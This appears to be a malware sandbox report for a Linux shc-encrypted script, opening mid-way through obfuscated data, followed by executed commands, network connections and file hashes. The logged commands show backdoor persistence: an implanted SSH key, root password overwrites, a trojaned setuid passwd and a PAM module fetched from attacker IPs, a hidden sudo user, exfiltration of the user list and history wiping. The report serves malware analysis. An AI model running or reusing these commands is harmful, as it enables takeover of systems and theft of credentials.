Cz$xCz$yCz$ADz$BDz$CDz$CBz$DBz$DDz$z$eBz$z$EDz$FDz$GDz$HDz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$IDz$JDz$KDz$LDz$MDz$NDz$ODz$PDz$z$uCz$vCz$QDz$RDz$EDz$FDz$SDz$z$TDz$UDz$CCz$VDz$WDz$XDz$z$eBz$z$IDz$JDz$YDz$ZDz$NCz$IDz$JDz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$fz$aDz$bDz$cDz$IDz$JDz$YDz$dDz$eDz$fDz$z$gDz$kCz$lCz$mCz$nCz$hDz$iDz$VCz$jDz$kDz$iDz$lDz$z$hCz$iCz$jCz$jDz$kDz$iDz$lDz$z$yz$mDz$nDz$oDz$IDz$JDz$gCz$z$eBz$z$eBz$z$pDz$aBz$qDz$rDz$z$pDz$aBz$qDz$sDz$z$pDz$aBz$tDz$uDz$vDz$z$pDz$aBz$tDz$uDz$wDz$z$pDz$aBz$tDz$uDz$xDz$yDz$z$IDz$JDz$KDz$AEz$BEz$CEz$DEz$EEz$oDz$tCz$TBz$UBz$VBz$WBz$z$IDz$JDz$FEz$AEz$BEz$CEz$DEz$EEz$oDz$tCz$TBz$UBz$VBz$WBz$z$uCz$vCz$AEz$BEz$CEz$DEz$EEz$GEz$z$yz$HEz$IEz$Az$JEz$KEz$LEz$ZBz$MEz$NEz$z$OEz$PEz$DDz$z$fz$QEz$REz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$ZEz$aEz$bEz$z$yz$HEz$IEz$Gz$Hz$cEz$dEz$eEz$fEz$sCz$gEz$lBz$z$IDz$JDz$KDz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$FEz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$uCz$vCz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$uCz$vCz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$qEz$dBz$vz$wz$xz$qBz$rEz$z$eBz$z$fz$aDz$sEz$hEz$iEz$tEz$eDz$fDz$z$yz$HEz$IEz$Gz$Hz$uEz$vEz$wEz$fEz$sCz$YDz$xEz$yEz$gCz$z$AFz$BFz$CFz$DFz$z$eBz$z$gDz$gEz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$EFz$FFz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$yz$HEz$IEz$Nz$GFz$HFz$IFz$JFz$KFz$LFz$MFz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$IDz$JDz$KDz$LDz$MDz$NFz$OFz$PFz$z$IDz$JDz$KDz$LDz$MDz$QFz$RFz$SFz$z$TFz$UFz$VFz$WFz$YBz$XFz$YFz$ZFz$z$aFz$z$xBz$bFz$cFz$dFz$eFz$fFz$gFz$hFz$iFz$jFz$kFz$lFz$mFz$nFz$oFz$pFz$qFz$rFz$sFz$tFz$uFz$vFz$wFz$xFz$yFz$AGz$BGz$CGz$DGz$EGz$FGz$GGz$HGz$IGz$JGz$KGz$LGz$MGz$NGz$OGz$PGz$VFz$WFz$dBz$vz$wz$xz$qBz$rEz$z$EDz$FDz$GDz$QGz$xBz$RGz$SGz$TGz$dBz$vz$wz$xz$qBz$rEz$z$xBz$UGz$VGz$WGz$XGz$YGz$cDz$xBz$RGz$ZGz$aGz$bGz$cGz$dGz$eGz$fGz$gGz$z$uCz$vCz$XFz$YFz$hGz$iGz$DFz$jGz$kGz$lGz$mGz$gEz$nGz$sBz$tBz$uBz$aBz$RBz$pEz$z$gDz$kCz$lCz$mCz$nCz$oGz$JFz$PGz$pGz$qGz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$rGz$sGz$z$xBz$bFz$cFz$dFz$eFz$fFz$gFz$hFz$iFz$jFz$kFz$lFz$mFz$nFz$oFz$pFz$qFz$rFz$sFz$tFz$uFz$vFz$wFz$xFz$yFz$AGz$BGz$CGz$DGz$EGz$FGz$GGz$HGz$IGz$JGz$KGz$LGz$MGz$NGz$OGz$tGz$uGz$TBz$UBz$VBz$bBz$cBz$z$IDz$JDz$KDz$vGz$jDz$wGz$ECz$FCz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$KDz$vGz$xGz$yGz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$CHz$jDz$wGz$ECz$FCz$jDz$wGz$ECz$DHz$lEz$EHz$TBz$UBz$VBz$bBz$cBz$z$CHz$xGz$yGz$NCz$AHz$BHz$AEz$BEz$JCz$QFz$RFz$FHz$GHz$dBz$vz$wz$xz$qBz$rEz$z$HHz$jDz$IHz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$VHz$WHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$FBz$XHz$YHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$z$hCz$iCz$ZHz$aHz$JCz$QFz$RFz$bHz$TBz$UBz$VBz$bBz$cBz$z$hCz$iCz$cHz$dHz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$gDz$jDz$wGz$ECz$FCz$xGz$yGz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$yz$HEz$IEz$Nz$GFz$eHz$RFz$fHz$gHz$hHz$iHz$gCz$z$fz$aDz$bDz$jHz$JCz$QFz$kHz$lHz$mHz$mz$nz$z$HHz$nHz$NCz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$oHz$pHz$qHz$rHz$sHz$tHz$uHz$vHz$wHz$xHz$yHz$AIz$BIz$CIz$DIz$QFz$kHz$lHz$EIz$FIz$LBz$GIz$HIz$IIz$JIz$KIz$LIz$MIz$NIz$OIz$PIz$QIz$RIz$z$hCz$iCz$jCz$nHz$NCz$oHz$pHz$SIz$TBz$UBz$VBz$bBz$cBz$z$eBz$z$oHz$TIz$UIz$MDz$QFz$VIz$WIz$XIz$YIz$kEz$z$fz$QEz$ZIz$oHz$TIz$aIz$eDz$fDz$z$fz$bIz$HCz$cIz$dIz$kHz$lHz$eIz$fIz$gIz$aEz$bEz$z$yz$mDz$UEz$hIz$iIz$jIz$kIz$QIz$lIz$mIz$nIz$oIz$pIz$qIz$rIz$UEz$sIz$tIz$uIz$wGz$QIz$RIz$vIz$wIz$oHz$TIz$sGz$z$eBz$z$eBz$z$xIz$sGz$z$HHz$kCz$lCz$mCz$nCz$yIz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$VHz$WHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$FBz$XHz$YHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$z$hCz$iCz$jCz$kCz$lCz$mCz$nCz$AJz$ECz$BJz$z$CJz$DJz$EJz$FJz$GJz$z$fz$bIz$HCz$cIz$HJz$IJz$CJz$eDz$fDz$z$yz$mDz$JJz$KJz$AHz$BHz$LJz$xCz$yCz$ADz$BDz$AHz$BHz$vIz$MJz$NJz$OJz$PJz$z$eBz$z$eBz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$xBz$QJz$RJz$SJz$TJz$sBz$tBz$uBz$aBz$RBz$pEz$z$xBz$bFz$cFz$UJz$VJz$WJz$SJz$TJz$sBz$tBz$uBz$aBz$RBz$pEz$z$xBz$bFz$cFz$UJz$XJz$YJz$ZJz$aJz$dBz$vz$wz$xz$qBz$rEz$z$xBz$bFz$cFz$dFz$eFz$bJz$cJz$dJz$eJz$fJz$gJz$hJz$iJz$jJz$kJz$lJz$mJz$nJz$oJz$pJz$qJz$rJz$sJz$tJz$uJz$vJz$wJz$xJz$yJz$AKz$BKz$CKz$DKz$EKz$FKz$GKz$HKz$IKz$JKz$OGz$ZJz$aJz$dBz$vz$wz$xz$qBz$rEz$z$CHz$kCz$lCz$mCz$nCz$oGz$JFz$KKz$LKz$ZJz$aJz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$eBz$z$fz$MKz$NKz$OKz$PKz$QKz$RKz$SKz$eDz$fDz$z$yz$HEz$IEz$Xz$uEz$vEz$wEz$TKz$UKz$YDz$xEz$yEz$gCz$z$AFz$BFz$kCz$lCz$mCz$VKz$z$eBz$z$fz$aDz$bDz$wCz$xCz$yCz$ADz$WKz$HBz$aIz$eDz$fDz$z$CHz$kCz$lCz$mCz$nCz$XKz$YKz$ZKz$kCz$lCz$mCz$aKz$bKz$cKz$z$hCz$iCz$jCz$kCz$lCz$mCz$aKz$bKz$cKz$z$eBz$z$kCz$lCz$mCz$aKz$bKz$cKz$dKz$tBz$uBz$aBz$eKz$tBz$uBz$aBz$fKz$gKz$hKz$iKz$jKz$z$xBz$kKz$lKz$ACz$BCz$CCz$DCz$ECz$FCz$GCz$HCz$ICz$JCz$KCz$LCz$MCz$NCz$LCz$OCz$LCz$PCz$QCz$RCz$sz$LBz$SCz$TCz$UCz$VCz$WCz$XCz$mKz$nKz$oKz$pKz$z$HBz$JHz$qKz$HIz$IIz$rKz$sKz$tKz$uKz$vKz$wKz$xKz$YFz$yKz$YFz$ALz$BLz$xBz$kKz$CLz$EIz$DLz$ELz$uHz$vHz$wHz$FLz$GLz$HLz$ILz$JLz$KLz$xGz$LLz$MLz$NLz$OLz$PLz$YFz$QLz$RLz$z$SLz$TLz$ULz$GJz$z$uCz$vCz$hEz$EJz$VLz$SLz$TLz$WLz$z$uCz$vCz$wCz$xCz$yCz$ADz$BDz$XLz$YLz$z$uCz$vCz$YBz$ZLz$z$yz$HEz$IEz$Zz$az$aLz$bLz$cLz$dLz$eLz$fLz$gLz$hLz$z$yz$HEz$IEz$Tz$Uz$Vz" /tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

/usr/bin/apt-get

[apt-get install -y msr-tools]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/usr/bin/ischroot

[/usr/bin/ischroot -t]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/bin/sh

[/bin/sh -c /usr/sbin/dpkg-preconfigure --apt || true]

/usr/sbin/dpkg-preconfigure

[/usr/sbin/dpkg-preconfigure --apt]

/usr/local/sbin/locale

[locale charmap]

/usr/local/bin/locale

[locale charmap]

/usr/sbin/locale

[locale charmap]

/usr/bin/locale

[locale charmap]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-multi-arch]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-protected-field]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 32 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 32 --configure --pending]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/var/lib/dpkg/info/man-db.postinst

[/var/lib/dpkg/info/man-db.postinst triggered /usr/share/man]

/usr/bin/setpriv

[setpriv --reuid man --regid man --init-groups -- /usr/bin/mandb -pq]

/usr/bin/mandb

[/usr/bin/mandb -pq]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/test

[/usr/bin/test -e /usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service]

/usr/bin/test

[/usr/bin/test -S /var/run/dbus/system_bus_socket]

/usr/bin/gdbus

[/usr/bin/gdbus call --system --dest org.freedesktop.PackageKit --object-path /org/freedesktop/PackageKit --timeout 4 --method org.freedesktop.PackageKit.StateHasChanged cache-update]

/bin/echo

[/bin/echo]

/bin/sh

[sh -c -- test -x /usr/lib/needrestart/apt-pinvoke && /usr/lib/needrestart/apt-pinvoke -m u || true]

/usr/lib/needrestart/apt-pinvoke

[/usr/lib/needrestart/apt-pinvoke -m u]

/usr/bin/dbus-send

[dbus-send --system --dest=org.freedesktop.login1 --print-reply /org/freedesktop/login1 org.freedesktop.DBus.Properties.Get string:org.freedesktop.login1.Manager string:PreparingForShutdown]

/usr/bin/rm

[rm -f /run/needrestart/unpacked]

/usr/sbin/needrestart

[/usr/sbin/needrestart -m u]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --vm --quiet]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --container --quiet]

/usr/local/sbin/who

[who -r]

/usr/local/bin/who

[who -r]

/usr/sbin/who

[who -r]

/usr/bin/who

[who -r]

/usr/bin/python3.12

[/usr/bin/python3.12 -]

/bin/sh

[sh -c -- if [ -d /var/lib/update-notifier ]; then touch /var/lib/update-notifier/dpkg-run-stamp; fi; /usr/lib/update-notifier/update-motd-updates-available 2>/dev/null || true]

/usr/bin/touch

[touch /var/lib/update-notifier/dpkg-run-stamp]

/usr/lib/update-notifier/update-motd-updates-available

[/usr/lib/update-notifier/update-motd-updates-available]

/usr/bin/apt-config

[apt-config shell StateDir Dir::State]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell ListDir Dir::State::Lists]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell DpkgStatus Dir::State::status]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell EtcDir Dir::Etc]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell SourceList Dir::Etc::sourcelist]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/find

[find /var/lib/apt/lists/ /etc/apt/sources.list //var/lib/dpkg/status -type f -newer /var/lib/update-notifier/updates-available -print -quit]

/usr/bin/dirname

[dirname /var/lib/update-notifier/updates-available]

/usr/bin/mktemp

[mktemp -p /var/lib/update-notifier]

/usr/lib/update-notifier/apt-check

[/usr/lib/update-notifier/apt-check --human-readable ]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/ischroot

[/usr/bin/ischroot -t]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/mv

[mv /var/lib/update-notifier/tmp.8I0ItClD2x /var/lib/update-notifier/updates-available]

/usr/bin/chmod

[chmod +r /var/lib/update-notifier/updates-available]

/usr/bin/rm

[rm -f /var/lib/update-notifier/tmp.8I0ItClD2x]

/usr/bin/cat

[cat /etc/passwd]

/usr/bin/tr

[tr \n ]

/usr/bin/grep

[grep /bin/bash\|/bin/sh\|/zsh\|/fish]

/usr/bin/cut

[cut -d: -f1]

/usr/bin/chmod

[chmod +x /var/tmp/.xrx/uninstall.sh]

/var/tmp/.xrx/uninstall.sh

[/var/tmp/.xrx/uninstall.sh 2]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/uninstall.sh]

/usr/bin/crontab

[crontab -r]

/usr/bin/chattr

[chattr -ia /etc/crontab]

/usr/bin/rm

[rm -rf /etc/crontab]

/usr/bin/touch

[touch /etc/crontab]

/usr/bin/pkill

[pkill -9 xri]

/usr/bin/pkill

[pkill -9 xrx]

/usr/bin/pkill

[pkill -STOP xxi]

/usr/bin/pkill

[pkill -STOP xmu]

/usr/bin/pkill

[pkill -STOP dhcpi]

/usr/bin/chattr

[chattr -i /usr/lib/updated 2]

/usr/bin/chattr

[chattr -a /usr/lib/updated 2]

/usr/bin/rm

[rm -rf /usr/lib/updated]

/tmp/样本/Linux/shc加密脚本/init.sh

[./init.sh]

/usr/bin/chattr

[chattr -i /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -a /root/.ssh/authorized_keys]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys2]

/usr/bin/cp

[cp key /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr +ia /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -ia /etc/shadow]

/usr/bin/chattr

[chattr -ia /etc/passwd]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ root]

/usr/bin/crontab

[crontab -u root -r]

/usr/bin/sudo

[sudo -u root sh -c echo $HOME]

/usr/bin/sh

[sh -c echo $HOME]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys]

/usr/bin/cp

[cp /var/tmp/.xrx/key /root/.ssh/authorized_keys]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ user]

/usr/bin/crontab

[crontab -u user -r]

/usr/bin/sudo

[sudo -u user sh -c echo $HOME]

/usr/bin/sh

[sh -c echo $HOME]

/usr/bin/rm

[rm -rf /home/user/.ssh/authorized_keys]

/usr/bin/cp

[cp /var/tmp/.xrx/key /home/user/.ssh/authorized_keys]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ root]

/usr/bin/chattr

[chattr -iae /bin/passwd]

/usr/bin/chattr

[chattr -iae /usr/bin/passwd]

/usr/bin/mv

[mv /bin/passwd /bin/passwd.orig]

/usr/bin/mv

[mv /usr/bin/passwd /usr/bin/passwd.orig]

/usr/bin/curl

[curl -sO http://185.252.178.82:6972/passwd]

/usr/bin/wget

[wget -q http://185.252.178.82:6972/passwd]

/usr/bin/chmod

[chmod 4755 /bin/passwd]

/usr/bin/chmod

[chmod u+s /bin/passwd]

/usr/bin/cp

[cp /bin/passwd /usr/bin/passwd]

/usr/bin/curl

[curl -sO http://185.252.178.82:6972/pam_tms]

/usr/bin/wget

[wget -q http://185.252.178.82:6972/pam_tms]

/usr/bin/chmod

[chmod +x /sbin/pam_tms]

/usr/bin/grep

[grep -q pam_tms /etc/pam.d/common-auth]

/usr/sbin/useradd

[useradd cheeki]

/usr/sbin/usermod

[usermod -aG sudo cheeki]

/usr/sbin/usermod

[usermod -aG wheel cheeki]

/usr/sbin/usermod

[usermod -p $6$vrC8Hya.mmeUeIem$Li01KI3RQUpyYepjXUhHF23fTle/wXqAoR0xUFo697faBvmsuXJBTMMK89vGf1YHzhztRGGsNbA/eTIIRXy5Y/ cheeki]

/usr/bin/mv

[mv /var/tmp/.xrx/key /home/cheeki/.ssh/authorized_keys]

/usr/bin/mkdir

[mkdir /var/tmp/.x]

/usr/bin/mv

[mv /var/tmp/.xrx/secure /var/tmp/.x/secure]

/usr/bin/chmod

[chmod +x /var/tmp/.x/secure]

/var/tmp/.x/secure

[/var/tmp/.x/secure]

/usr/bin/cat

[cat /etc/passwd]

/usr/bin/grep

[grep /bin/bash\|/bin/sh\|/zsh\|/fish]

/usr/bin/cut

[cut -d: -f1]

/usr/bin/tr

[tr \n ]

/usr/bin/base64

[base64]

/usr/bin/curl

[curl -s http://179.43.154.189:1010/users?userlist=cm9vdCB1c2VyIGNoZWVraSA=]

/usr/bin/rm

[rm -rf /root/.bash_history]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/init0]

/usr/bin/rm

[rm -rf init0]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 _http._tcp.se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
SE 194.71.11.173:80 se.archive.ubuntu.com tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
CH 179.43.154.189:1010 tcp

Files

/var/cache/apt/archives/partial/msr-tools_1.3-5build1_amd64.deb

MD5 41d685bb374b8b9765cc8ad68c6ddd7c
SHA1 4d7f9893b486db574f737fd82f89f1db05d44e4e
SHA256 aa668bd5e23e3f703518eec2e52fffd6275c897ba84ef8a34ef646ac4dde32f4
SHA512 b9d5800641b0fb294d1688faf9dbd0a461a6347f405ab106dc6e2c71a0667c9a39eeb95904a218e5af57683a4f1882876f4ab538aecde442f68265c7467127a0

/var/log/apt/eipp.log.xz

MD5 cc6206f59ec7a64c75f24e79d19c69f7
SHA1 9e5ede07f6b85a9105aa234fa3e78898c3997fb2
SHA256 a961625a91f21ebeed9d5b96cd4063dd72a067d1c41884809f5590573471fad5
SHA512 ce257843f03d72692c7890df5f59943263144314f5fd817bff690458ec26096bb3dec1bd87beb8310580e86618f28282bb1b26366f832ab2eb5ccd8f8ff12c2f

/var/lib/dpkg/updates/tmp.i

MD5 0c83c7b81780508a33c1ea43e49bd0ab
SHA1 1bd385df4de89b74a9e0eaeb42078a3aa13e7a56
SHA256 9c1311fe3442b3427006b95fafa9e55261702b36fbc90b3300e9aca091498dd1
SHA512 97328bd96c405168e5226780a4664f1a6c4406c7b3ec66899d898053346c3e070e7c7cf7e2b659a1781fe5822ec9a6440beb2047e98994977e576562f5d33747

/var/lib/dpkg/tmp.ci/control

MD5 1e0f0dfa728ed7715510e29d0c820cfa
SHA1 9e20884889df0752af14f0afcc0a6bbdb5470c62
SHA256 7263b977924b9c59af6a5ad7da21e3f85d24beb3c4f0d6515ff1eb06fc11af4a
SHA512 41afc8ea626977e98101a9cf492c0d9736f32cc4bb2d0496d2a46769807a01f5282ba00c07141956eea7c364c7b5ce8966b2a891b7dd77d3fdab84b4ccd1f2b2

/var/lib/dpkg/tmp.ci/md5sums

MD5 f0183116fb005f86b0d573c6473fae9b
SHA1 6672eb52c0cb916df1c6924ace41b81264ef0b8b
SHA256 b08ea9d4bf7879ee69d29795219f6958979932f80976133636eecf5d8e9f1272
SHA512 314038597f986c2e1816b865e085014905b92e94d73f08b11a0b560362edb48a335a708617ae310375619752514475c93e48f6a4461e7675206cb5ec884f3a81

/var/lib/dpkg/updates/tmp.i

MD5 6e67dede930df3bc51a5d372940d8c75
SHA1 03a54c296eb9f17c41ea1142f7f2c2c70d715e20
SHA256 087c445cd41888ce3da908be88a19b2bec608e999d92cf006a2aaaebf9452bde
SHA512 28867ada88b421d70616002150c5e91bbd402907365932f9b1a47e3a36233a4f16791e457ff7e1a59eaced3c4bf16626675b6d6e282a50fd9b94397b1126077b

/var/lib/dpkg/updates/tmp.i

MD5 34eb56f174133f283fdc94da47b268f3
SHA1 c68b6ee72b7027222df4bed6b2fba79a3c56b670
SHA256 ad6b382be033c06573cc513c010fe8b7f6be7d43194923bf5e488ed093b8fd83
SHA512 f5195388268211b15e3c27583138d541ec581cb8e3ccea4c26f40cace1a06826cf2997603bddac110e935f84453ca33af08c048d7be76951d9543f41ede2574d

/var/lib/dpkg/updates/tmp.i

MD5 05ffb6efd8d30243a913f95453c376ab
SHA1 d3b05c42a5c9db40d2f375f40764cc2c81e14fcc
SHA256 78b6c50455d3659bb7effbb14312d8eeea86c3a248d0a497e43cf4d6d7ea0be3
SHA512 4c008f42d41d0b150c70593bc9d30152b3738f3341a73d4d3ec1ec8c3e4194b0a633efc1a8570fbdbd29032c323686a58d8d2fc9c922e49d3c399db0c5e9f98b

/var/lib/dpkg/updates/tmp.i

MD5 edae9b7299f2afc09258160786a4dada
SHA1 dd7aa0c8aa29e937efd88b9eb39811e1460b62b9
SHA256 cf7d2275d2effcc231f426e078582b9665c4a2407e267c9e25546220308dd569
SHA512 0e3341d862dde54e87b2cea0384cc79a4594f7a22a322d501fbb386559511cc8e6046bf134bc1496d04bddb80c8213dd0438368d3a5d20b82099a5a4c9cc30ff

/var/lib/dpkg/status-new

MD5 fda2311561ddfd0654505fa2cf369d91
SHA1 2a1be09d3084d3e2ff26e6048f4176af376b1a76
SHA256 0675b27fe2f05cf66d498e5ec5bb6f975aed807cf55440c03bb50a6800435500
SHA512 bef483a282d05f4bee4d3f0c353588cf03e1e7db8fcb9149c1c769a30bf1d247fd74c77485fa630317eff8c4dc6dc114319fdd7526e527e6f755ddb3e1e71e4c

/var/cache/man/2524

MD5 37106c0ca44953e5d7da743c5293634f
SHA1 8466df9e62da69995aaf6706af447e41c34b8010
SHA256 3e9b6f702bb7b5bef6331b69b9a4de18bfe8f7d006808213a72e0911a04fc507
SHA512 e01226df669f3eee9f60acea93c70adb27a3442477e54157eb3182464a7be5323ddf943766e2370ef9e9138172373ae1781c87483685428bd4548f59249b3555

/var/lib/dpkg/status-new

MD5 fc66f74346fb6e7b8d5593e437ceb6f3
SHA1 f35dc1b6a2457ea70067c1a5e48c10ba22fce953
SHA256 e26fb022c7efc9ae568e73e8b1f2034680d977bc2af726d50ce79a69ee0ad3a9
SHA512 68949144614c196d0d1bb9a94be6aa95670080115bcdb1253d1e66fdfd8244dbeda32c6dda2c8850275fc9382da452df58aafae1c2d5f8bbb0803ce1e7d3c425

/var/lib/update-notifier/tmp.8I0ItClD2x

MD5 9e4474dd78060139ab355ed18427f88e
SHA1 e4608e740783b34ab9917ce0a4f379a9c760e725
SHA256 6e285b096a5771d3f0f75b00ea3ce4df1fa1648b6f6ba2311bd8eb5e0c90c708
SHA512 777cad103870948f8109488fe8c02a2ef616aca87319c446d305bb6ddcc01093266bcf78d1e76871937bde94e175a72b574985b33f693e7e0e542b9ed9f87706

/etc/passwd+

MD5 cea58ef2a54a8678646f9398f140d2de
SHA1 46ab8bcd243efa9c87b3859cd342f683f168e133
SHA256 ec0d3574508143d89a5ca35fcc9fe9ae0b0a1a6b0d89f47cbe17ac1d9d88072a
SHA512 9d6879919c7aeb654b27bd67292ebd5e5799cf184d5b45e4debb2d2d8666aebd1e078bfaed7cdb360d0e79a69f01aae009ff5867bf1688389e373de422177d74

/etc/shadow+

MD5 dbe36c4790dde0f43497ef20eb0ed5a7
SHA1 76079e0236375edafd03eb755002f028274eea6e
SHA256 b43184992657b9ce2f704b3a6466dccb9cb1613ed68d39405d615593ec072fd6
SHA512 aba3db67f29732c506a29093fefc7d01494b736d7166193bcedca5500f0e5200b3202fba80c7276be74231ac5615924473fabeaa4b289bd4c597455acd92d933

/etc/shadow+

MD5 89e46234e78ed518c8389df3451d9266
SHA1 3b5fa44ab3c218dc3ee6f1206442b7f1b888d56a
SHA256 6e23ed46138dac8f8110a4f00cabc870f66f8abba307b812c28f125a6b4c6f4b
SHA512 c1c13cd2a1033f98435d2ba14591cced1189b64d57aa7aa92fe63aacde2874f9f2bd8e1c29a027a2c2863e36b8d2f0714d7db30d50e8544b4a9f82760a5b5aa1

/etc/passwd+

MD5 1a2923599c03f2da0e70bc13fc7d2fcb
SHA1 7c850050beffefcd03cee16c3f74cbe63c7f9680
